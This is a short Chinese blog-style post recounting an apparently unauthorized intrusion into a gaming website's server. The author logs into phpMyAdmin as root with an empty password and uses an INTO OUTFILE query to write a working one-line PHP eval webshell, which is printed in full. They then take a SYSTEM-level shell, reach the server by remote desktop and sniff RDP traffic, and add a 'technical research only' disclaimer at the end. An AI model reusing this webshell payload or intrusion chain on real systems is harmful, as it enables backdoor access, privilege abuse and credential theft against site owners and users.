某奇葩游戏站点服务器过程

某奇葩游戏站点服务器过程

目标：xxx游戏站

发现有phpmyadmin

没想到root空口令直接登录

这个管理员是真的有多危险

接下来就是找网站路径写马

运气太好

select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'XX'

不多说了，直接getshell了

发现既然是system权限，那么直接提权吧

找终端

经过判断，发现了终端

直接进服务器

嗅探到了几个rdp的东东，不玩了，就到这里

本文章只是技术研究，不做任何破坏

一个不会管理服务器的管理员是多么可怕